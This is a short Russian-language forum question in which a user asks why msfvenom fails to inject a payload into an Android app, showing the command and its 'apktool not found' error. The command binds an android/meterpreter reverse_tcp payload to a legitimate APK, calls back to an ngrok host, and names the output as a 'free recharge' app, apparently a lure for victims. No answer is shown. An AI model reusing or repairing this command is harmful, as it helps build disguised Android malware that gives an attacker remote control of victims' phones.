Не могу сделать полезную нагрузку с MSFvenom - PullRequest
0 голосов
/ 01 мая 2020

Я не могу добавить полезную нагрузку в приложение. Как это сделать

C:\Users\USER\Desktop>msfvenom -x myidea.apk -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=11612 -o myideafreerecharge.apk
    C:/metasploit-framework/embedded/lib/ruby/gems/2.6.0/gems/activesupport-4.2.11.1/lib/active_support/dependencies.rb:274: warning: Win32API is deprecated after Ruby 1.9.1; use fiddle directly instead
    Using APK template: myidea.apk
    [-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
    [-] No arch selected, selecting arch: dalvik from the payload
    Error: apktool not found. If it's not in your PATH, please add it.
...